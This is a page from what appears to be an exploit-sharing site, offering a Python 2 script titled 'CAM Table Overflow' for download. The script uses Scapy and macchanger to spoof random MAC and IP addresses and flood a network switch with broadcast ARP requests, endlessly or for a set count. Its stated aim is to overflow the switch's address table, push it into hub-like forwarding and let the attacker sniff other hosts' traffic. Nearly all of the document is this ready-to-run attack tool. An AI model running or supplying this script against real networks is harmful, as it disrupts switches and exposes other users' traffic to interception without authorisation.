CAM Table Overflow

Download | Vote Up (1) | Vote Down (0) 
#!/usr/bin/python
#Author: Storn
#
#Flood the Switch's CAM Table with a lot Fake MAC Adress
#which drives the switch in HUB Mode then go to sniff :p
#
#Use MacChanger and Scapy
#
#argv[1] = Iface
#argv[2] = Loop or Endless loop by default
#

from scapy.all import *
import random
import sys
import os

# Random Mac Adress
def mac_gen():
 hexa = [0,1,2,3,4,5,6,7,8,9,"a","b","c","d","e","f"]
 a = 1
 b = 0
 spoof_mac = ""
 while a != 7:
  while b != 2:
   rnd = random.randint(0, 15)
   spoof_mac = str(spoof_mac) + str(hexa[rnd])
   b = b + 1
  if a != 6:
   spoof_mac = str(spoof_mac) + ":"
  a = a + 1
  b = 0
 return str(spoof_mac)


# Random IP Adress
def ip_gen():
 i = 1
 spoof_ip = ""
 while i != 5:
  rnd = random.randint(0, 255)
  spoof_ip = str(spoof_ip) + str(rnd)
  if i != 4:
   spoof_ip = str(spoof_ip) + "."
  i = i + 1
 return str(spoof_ip)


# Send ARP packet
def send_packet(src_mac, src_ip, dst_ip, intface):
 ether = Ether(dst= "ff:ff:ff:ff:ff:ff")
 arp   = ARP(op="who-has", psrc = src_ip, pdst = dst_ip, hwsrc = src_mac, hwdst = "ff:ff:ff:ff:ff:ff")
 mac_backet = ether/arp  
 # mac baguette? NULL! :Troll:
 
 sendp(mac_backet, iface = intface)

# Mac spoofing
def mac_spoof(mac_addr, intface):
 os.system("ifconfig " + intface + " down")
 os.system("macchanger -m " + mac_addr + " " + intface)
 os.system("ifconfig " + intface + " up")

# Main
if __name__ == "__main__":

 os.system("clear")

 if len(sys.argv) < 2:
  print sys.argv[0] + " <Iface> <Loop or Endless loop by default>"
  sys.exit() 


 if len(sys.argv) < 3:
  while 1:
   srcmac = mac_gen()
   srcip = ip_gen()
   dstip = ip_gen()
   try:
    mac_spoof(srcmac, sys.argv[1])
    send_packet(srcmac, srcip, dstip, sys.argv[1])
   except: 
    print "\n[!] Can't Send ARP packet... Retry...\n"
    sys.exit()
   else:
    print "\n\n[*] " + srcmac + " > ff:ff:ff:ff:ff:ff"
    print "\n    Who has " + dstip + "? Tell " + srcip + "\n"

 else:
  l = 0
  while l != int(sys.argv[2]):
   srcmac = mac_gen()
   srcip = ip_gen()
   dstip = ip_gen()
   try:
    mac_spoof(srcmac, sys.argv[1])
    send_packet(srcmac, srcip, dstip, sys.argv[1])
   except: 
    print "\n[!] Can't Send ARP packet... Retry...\n"
    sys.exit()
   else:
    print "\n\n[*] " + srcmac + " > ff:ff:ff:ff:ff:ff"
    print "\n    Who has " + dstip + "? Tell " + srcip + "\n"
   l = l+1
  print "\n\n[+] Attack Completed with " + str(sys.argv[2]) + " Packets\n"

St0rn

Be the first to give feedback !
Please login to comment !